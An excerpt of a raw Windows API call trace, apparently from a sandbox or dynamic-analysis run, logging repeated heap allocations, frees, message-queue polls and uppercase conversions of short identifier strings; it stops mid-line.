HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0216.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0216.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0216.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0216.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0216.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0216.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0216.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0216.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0216.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.089] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0216.090] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0216.090] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0216.090] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0216.090] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.090] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0216.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0216.091] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0216.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8c0 [0216.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748b0 [0216.091] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0216.092] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0216.092] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0216.092] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.092] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748b0 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0216.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.093] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0216.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0216.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0216.094] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab968 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74160 [0216.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0216.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0216.094] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0216.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0216.095] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0216.095] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0216.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0216.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.095] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, 